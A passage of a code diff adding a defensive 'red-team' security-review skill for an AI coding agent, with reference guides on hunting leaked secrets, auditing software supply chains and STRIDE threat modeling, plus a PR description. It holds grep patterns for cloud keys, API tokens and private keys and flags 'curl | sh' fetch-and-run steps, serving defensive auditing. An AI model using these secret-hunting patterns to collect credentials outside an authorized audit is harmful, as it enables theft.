+git log -p --all -S "AKIA"      # any historical commit containing AKIA prefix
+git log -p --all -S "BEGIN PRIVATE KEY"
+```
+
+If found:
+
+1. **Treat the secret as compromised.** It is in history; assume disclosed.
+2. **Rotate the secret immediately.** Don't rewrite history first.
+3. **After rotation**, optionally rewrite history (`git filter-repo` / BFG) to remove the old secret. This requires force-push and coordination with all clones.
+4. **Document** in report: rotation timestamp, old → new, comms to consumers.
+
+## Client-Bundle Inspection
+
+Front-end bundles often contain inlined "public" keys that are actually private:
+
+```bash
+# Build the production bundle, then:
+Grep: "AKIA|sk_live|ghp_|xox[baprs]" in dist/ / build/ / .next/static/
+```
+
+Look for env vars exposed via build-time inlining (`NEXT_PUBLIC_*`, `VITE_*`, `REACT_APP_*`) — anything in those will end up in the client.
+
+## Log Hygiene
+
+```
+# Authorization header logged
+Grep: "log.*[Aa]uthorization"
+Grep: "log.*headers"          # check if headers are logged in entirety
+
+# Tokens in URL (then in access logs)
+Grep: "\\?(access_)?token="   # tokens in query strings
+Grep: "Bearer " in URL paths
+```
+
+**Rule**: tokens go in `Authorization` header, never in query strings. Headers can be redacted in logs; URLs end up in access logs everywhere.
+
+## CI / Container
+
+```
+# Dockerfile copies .env or secrets
+Grep: "COPY \\..*\\.env" in Dockerfile
+
+# CI prints env
+Grep: "env\\s*$|printenv" in .github/workflows/**/*.yml
+```
+
+## Output Template
+
+```markdown
+## Secret Hunt Findings
+
+### High Confidence (verified live secret)
+| ID | Type | Location | Line | Status | Rotated? |
+|----|------|----------|------|--------|----------|
+| S01 | AWS access key | src/config.ts | 42 | LIVE | NO — rotate |
+
+### Medium Confidence (likely secret, needs verification)
+| ID | Type | Location | Line | Action |
+|----|------|----------|------|--------|
+| S02 | high-entropy string | tests/fixture.json | 17 | verify if real |
+
+### Git History
+| ID | Secret | First commit | Last commit | Status |
+|----|--------|--------------|-------------|--------|
+| H01 | DB password | abc123 | def456 | rotated 2024-12-01 |
+
+### Remediation Required
+- [ ] Rotate S01 immediately
+- [ ] Verify S02
+- [ ] Move secrets to env / secret manager (not source)
+- [ ] Add gitleaks to pre-commit / CI
+- [ ] Audit access logs for last N days for compromise indicators
+```
+
+## Anti-Patterns (NEVER)
+
+- NEVER print full secret in writeup — first/last 4 chars + length is enough.
+- NEVER rewrite git history before rotating. Rotation first, history rewrite second.
+- NEVER assume "it's only in history" means safe. History is public on public repos and accessible to anyone with read access on private repos.
+- NEVER store secrets in source even if "encrypted at rest" — the decryption key has to live somewhere.
+- NEVER commit `.env` even with `.gitignore` "in front" — verify with `git ls-files .env`.

--- a/red-team/references/supply-chain.md
+++ b/red-team/references/supply-chain.md
@@ -1,0 +1,201 @@
+# Supply Chain
+
+Dependencies — direct, transitive, and the build pipeline that fetches them. Loaded on supply-chain-related queries or as part of full audit.
+
+## Threat Categories
+
+| Category | Description | Example |
+|----------|-------------|---------|
+| Known CVE | Dep version has documented vuln | event-stream / left-pad-style |
+| Typo-squat | Malicious lookalike of popular dep | `lodahs` vs `lodash` |
+| Maintainer compromise | Legit dep, account taken | ua-parser-js 2021 |
+| Transitive | Direct dep is fine, transitive is not | `lodash@4.17.20` via deep tree |
+| Install scripts | postinstall runs malicious code | shell.js / node-ipc |
+| Vendor-binary | Repo includes compiled binary, no source | random `tools/scanner.exe` |
+| Lockfile drift | lockfile not committed or out of sync | yarn.lock missing |
+| Registry confusion | private + public package conflict | dependency confusion (Birsan 2021) |
+
+## Tools (use if installed)
+
+```bash
+# JS / TS
+npm audit --json
+pnpm audit --json
+yarn audit --json
+
+# Universal (cross-language CVE)
+osv-scanner --json .
+osv-scanner --lockfile=package-lock.json
+
+# Python
+pip-audit --format json
+safety check --json
+
+# Go
+govulncheck ./...
+
+# Rust
+cargo audit --json
+
+# Snyk
+snyk test --json
+
+# OSSF Scorecard (project health)
+scorecard --repo=github.com/owner/repo
+```
+
+## Manual Audit (when no tooling)
+
+### 1. Lockfile Present?
+
+```
+Glob: "package-lock.json|pnpm-lock.yaml|yarn.lock|Cargo.lock|go.sum|poetry.lock|Pipfile.lock"
+```
+
+No lockfile = no reproducible install = supply chain vulnerability.
+
+### 2. Lockfile Drift
+
+For Node:
+
+```bash
+# Tree should match lockfile
+npm ls               # warns on drift
+pnpm install --frozen-lockfile  # in CI; fails on drift
+```
+
+If CI doesn't use `--frozen-lockfile` (or equivalent), commits can introduce undeclared deps.
+
+### 3. Postinstall / Preinstall Scripts
+
+```
+Read: package.json → scripts.{preinstall, postinstall, prepare, prepublish}
+```
+
+For each, verify it does what it claims. Common red flags:
+- Downloads binaries from arbitrary URLs.
+- Runs `curl | sh`.
+- Touches files outside the package dir.
+
+For deps:
+
+```bash
+npm pack <dep>  # extract and inspect
+# or
+node -e "console.log(require('./node_modules/<dep>/package.json').scripts)"
+```
+
+### 4. Deep Tree Inspection
+
+```bash
+# JS
+npm ls --all --json > tree.json
+npm fund   # who maintains what
+
+# Python
+pipdeptree --json > tree.json
+```
+
+Look for:
+- Unexpectedly deep transitive trees (one direct dep pulling 200 transitives).
+- Recently updated transitives with low download counts (typo-squat candidates).
+- Deps with single-maintainer / abandoned status.
+
+### 5. Typo-Squat / Lookalike
+
+```
+Read: package.json → dependencies, devDependencies
+```
+
+For each name:
+- Search npm: are there packages with very similar names?
+- Compare download counts: legitimate package has orders of magnitude more.
+- Check publish date: typo-squats are recent.
+
+### 6. Vendored Binaries
+
+```
+Glob: "vendor/**, third-party/**, tools/**, scripts/**.{exe,bin,dll,so,dylib}"
+```
+
+Any binary in the repo without source + build step is a black box. Flag it.
+
+### 7. Fetched-at-build
+
+```
+Grep in CI / build scripts: "curl|wget|fetch|invoke-webrequest"
+```
+
+Anything fetched during build should be:
+- HTTPS only.
+- Pinned to a hash / signed release (not `latest` / `master`).
+- From a known origin (GitHub releases, official CDN).
+
+## Dependency Confusion Check
+
+If your project uses both public (npm.org) and private (artifactory / verdaccio) registries:
+
+```
+Read: .npmrc, .yarnrc, package.json (publishConfig)
+```
+
+Risk: an attacker publishes a package on the public registry with the **same name** as your private one. If the registry-routing is wrong, the public (malicious) version is installed.
+
+Mitigation:
+- Scope private packages: `@yourorg/xyz`.
+- Pin scopes to private registry in `.npmrc`: `@yourorg:registry=https://your-registry`.
+- Reserve the unscoped name on the public registry as a placeholder.
+
+## Output Template
+
+```markdown
+## Supply Chain Audit
+
+### Tooling Run
+- npm audit: X CVEs (Y high, Z critical)
+- osv-scanner: X CVEs
+- (or: NO TOOLING — manual review only)
+
+### Direct Dep Health
+| Dep | Version | CVEs | Maintenance | Action |
+|-----|---------|------|-------------|--------|
+| ... | ... | ... | active / abandoned | upgrade / replace / accept |
+
+### Transitive Risks
+| Dep (path) | CVE | Severity | Reachable from your code? |
+|------------|-----|----------|---------------------------|
+| ... | ... | ... | yes / no / unknown |
+
+### Install-Script Risks
+| Dep | Script | Action | Verdict |
+|-----|--------|--------|---------|
+| ... | postinstall | curl... | reject |
+
+### Lockfile Status
+- Committed: yes / no
+- CI uses frozen install: yes / no
+- Drift: yes / no
+
+### Typo-Squat / Lookalike
+| Suspect | Real | Verdict |
+|---------|------|---------|
+
+### Vendored Binaries
+| Path | Origin | Audited? |
+|------|--------|----------|
+
+### Recommended Actions
+- [ ] Upgrade [dep] to [version] (fixes CVE-XXXX)
+- [ ] Replace [abandoned dep] with [maintained alternative]
+- [ ] Add `npm ci` / `pnpm install --frozen-lockfile` to CI
+- [ ] Add osv-scanner / npm audit to CI as blocking step
+- [ ] Scope private deps under @yourorg
+```
+
+## Anti-Patterns (NEVER)
+
+- NEVER `npm install` in production builds — use `npm ci` against committed lockfile.
+- NEVER use `latest` tags in package.json or container images.
+- NEVER `curl | sh` in install / build scripts.
+- NEVER vendor binaries without a source + build trail.
+- NEVER ignore CVE alerts on the assumption "we don't use that path" — transitive bugs are reachable in surprising ways.

--- a/red-team/references/threat-modeling.md
+++ b/red-team/references/threat-modeling.md
@@ -1,0 +1,137 @@
+# Threat Modeling — STRIDE + Shostack 4 Questions
+
+Loaded when user invokes threat modeling explicitly, or when the engagement targets a *system / feature* (not just a single file).
+
+## Shostack's 4 Questions
+
+The whole-system frame:
+
+```
+1. What are we building?
+2. What can go wrong?
+3. What are we doing about it?
+4. Did we do a good job?
+```
+
+Run these top-down, then drill into STRIDE per asset for question 2.
+
+### Question 1 — What are we building?
+
+Produce a **data-flow diagram** (DFD), even if just ASCII:
+
+```
+                         ┌──────────────┐
+   ┌──────────┐  HTTPS   │              │   ┌──────────┐
+   │  USER    │──────────│  WEB APP     │───│   DB     │
+   │ (browser)│          │              │   └──────────┘
+   └──────────┘          │              │
+                         │              │   ┌──────────┐
+   ┌──────────┐  webhook │              │───│  CACHE   │
+   │ STRIPE   │──────────│              │   └──────────┘
+   └──────────┘          │              │
+                         │              │   ┌──────────┐
+                         │              │───│ S3 / FS  │
+                         └──────────────┘   └──────────┘
+                                ▲
+                                │
+                       trust boundary
+                       (── − − − ── )
+```
+
+Mark **trust boundaries** — every line crossing one is a place where attacker control or data leakage is possible.
+
+### Question 2 — What can go wrong? (STRIDE)
+
+For each asset (each box, each line), apply STRIDE:
+
+| Letter | Threat | Concrete questions |
+|--------|--------|--------------------|
+| **S** Spoofing | identity forgery | Can an attacker authenticate as another user? Forge a session? Impersonate a service? |
+| **T** Tampering | data modification | Can an attacker modify data on the wire? In the DB? In transit between services? In logs after the fact? |
+| **R** Repudiation | deniable action | Can a user perform an action and deny it? Are auth events / mutations logged with non-repudiable identity? |
+| **I** Info disclosure | data leakage | What's exposed in error messages? Logs? Side channels? Backup files? S3 buckets? Stack traces? |
+| **D** DoS | availability loss | What input/load makes this asset unavailable? Are there resource limits? Rate limits? Circuit breakers? |
+| **E** Elevation | privilege gain | What lets a low-priv principal become high-priv? Vertical (user → admin)? Horizontal (user A → user B's data)? |
+
+Per-asset table:
+
+```markdown
+### Asset: User Session Cookie
+
+| STRIDE | Threat | Mitigation in place | Adequate? | Action |
+|--------|--------|---------------------|-----------|--------|
+| S | Stolen cookie used for spoofing | HttpOnly, Secure, SameSite=strict | yes | — |
+| T | Cookie value tampering | HMAC-signed | yes | — |
+| R | User claims they didn't perform action | audit log w/ session ID | partial | add device fingerprint |
+| I | Cookie leaked via XSS | HttpOnly + CSP | yes | — |
+| D | Cookie store DoS | session expiry + size limit | yes | — |
+| E | Session fixation → priv escalation | rotate on auth | yes | — |
+```
+
+### Question 3 — What are we doing about it?
+
+For each STRIDE row marked "no" or "partial":
+
+- Define a **specific** mitigation (not "improve security").
+- Place it in the code: file path, layer, control type.
+- Decide: prevent / detect / respond.
+
+Mitigation cheat sheet:
+
+| Threat type | Common controls |
+|-------------|-----------------|
+| Spoofing | strong auth, MFA, mutual TLS, short-lived tokens, session rotation |
+| Tampering | TLS, HMAC / signatures, immutable logs, integrity checks, code signing |
+| Repudiation | audit logs with non-repudiable identity, append-only stores, log shipping |
+| Info disclosure | encryption at rest + in transit, key mgmt, access controls, error sanitization, no PII in logs |
+| DoS | rate limits, quotas, timeouts, circuit breakers, autoscaling, load shedding |
+| Elevation | least privilege, role checks at every boundary, separation of duties, no client-trusted role |
+
+### Question 4 — Did we do a good job?
+
+Test the mitigations. For each:
+
+- **Unit / integration test** that fails when mitigation is removed.
+- **Negative test** that asserts the threat scenario is blocked (e.g. test that posts a forged JWT and expects 401).
+- **Regression test** in CI so the mitigation doesn't decay.
+
+Without this step, the threat model is paper. With it, the threat model is enforced.
+
+## Output Template
+
+```markdown
+## Threat Model: [System / Feature]
+
+### Scope
+[Target, in/out of scope, authorization]
+
+### Architecture (DFD)
+[ASCII DFD with trust boundaries]
+
+### Assets
+| Asset | Sensitivity | Owner |
+|-------|-------------|-------|
+| ... | ... | ... |
+
+### STRIDE per Asset
+[One table per asset, as above]
+
+### Top Threats (Ranked)
+| ID | Threat | Asset | STRIDE | Severity | Mitigation | Test |
+|----|--------|-------|--------|----------|------------|------|
+| T01 | ... | ... | S | High | ... | tests/auth.spec.ts:L23 |
+
+### Open Questions
+- [Things that need user / team input]
+```
+
+## Common Mistakes
+
+| Mistake | Fix |
+|---------|-----|
+| STRIDE applied at "system" level, no per-asset | Pick each asset, run STRIDE per asset |
+| Mitigations vague ("improve auth") | Specify file, layer, control |
+| No test for mitigation | Add negative test in same PR as mitigation |
+| Trust boundaries omitted from DFD | Mark every line that crosses boundary |
+| Internal services treated as fully trusted | Apply STRIDE there too — assume breach |
+| Threat model done once, never updated | Re-run on architecture changes; gate in PR template |


### PR DESCRIPTION
## Summary

New `red-team` skill: find vulnerabilities in your own codebase by adopting an attacker's mindset. **The best defence is attack.**

Encodes a real, structured protocol — not a vibes-based checklist. Defensive use only; Phase 0 authorization gate refuses unauthorized targets.

## The 7-Phase Protocol

```
0. SCOPE        Confirm authorization (BLOCKING)
1. RECON        Languages, frameworks, deps, deploy targets
2. ENUMERATE    Entry points → trust boundaries → sinks (taint tracing)
3. THREAT MODEL STRIDE per asset + Shostack 4 questions
4. VULN HUNT    Adversarial code search per threat (CWE/OWASP mapped)
5. EXPLOIT      Lockheed kill chain + MITRE ATT&CK chain reasoning
6. IMPACT       DREAD-lite or CVSS v3 scoring
7. REPORT       Severity-ranked findings + fix + regression test
```

## Files

- `red-team/SKILL.md` — frontmatter, router, 7 phases, smoke test, anti-patterns
- `red-team/README.md` — overview, entry points, optional CLI helpers
- `red-team/references/scope-and-authorization.md` — Phase 0 + refusal triggers + coordinated disclosure
- `red-team/references/threat-modeling.md` — STRIDE per asset, DFD, Shostack 4 questions
- `red-team/references/attack-surface.md` — entry/boundary/sink + taint tracing patterns per language
- `red-team/references/code-review-protocol.md` — phase-by-phase adversarial questions
- `red-team/references/kill-chain.md` — Lockheed kill chain + MITRE ATT&CK mapping + worked SQLi-to-compromise example
- `red-team/references/owasp-cwe.md` — OWASP Top 10 + CWE Top 25 with grep patterns + remediation
- `red-team/references/secret-hunting.md` — gitleaks/trufflehog + manual patterns + history scan
- `red-team/references/supply-chain.md` — lockfiles, postinstall, typo-squat, dep confusion, vendored binaries
- `red-team/references/reporting.md` — DREAD-lite + CVSS + per-finding + aggregate report templates

## Defensive Posture (BLOCKING)

The skill operates only against:
- Code in the working directory the user opened
- Systems for which the user has explicit written authorization (CTF, owned infra, signed pentest scope)

It refuses:
- Exploit payloads aimed at third-party systems
- Probes against live production the user does not own
- Detection-evasion for systems the user does not own
- Bypassing or attacking out-of-scope third parties

## Index updates

- `README.md` — skill listing + install commands + badge (8 → 9)
- `llms.txt` — skills section
- `docs/skills-overview.md` — table

## Note: conflict with PR #27

PR #27 (`first-principles`) also bumps badge 8 → 9. Whichever merges first, the other needs a rebase to bump 9 → 10.

## Test plan

- [ ] Verify SKILL.md frontmatter is valid YAML and matches folder name
- [ ] Activate via `"red team this code"` — should load and start at Phase 0 (scope check)
- [ ] Activate via `"threat model [feature]"` — should load `threat-modeling.md` and apply STRIDE
- [ ] Smoke test: paste vulnerable Express endpoint — should produce CWE-78 finding with chain + fix + regression test
- [ ] Refusal test: ask to attack a named third-party domain — should refuse with scope-clarification template
- [ ] Skim references for accuracy (OWASP IDs, CWE numbers, ATT&CK mappings)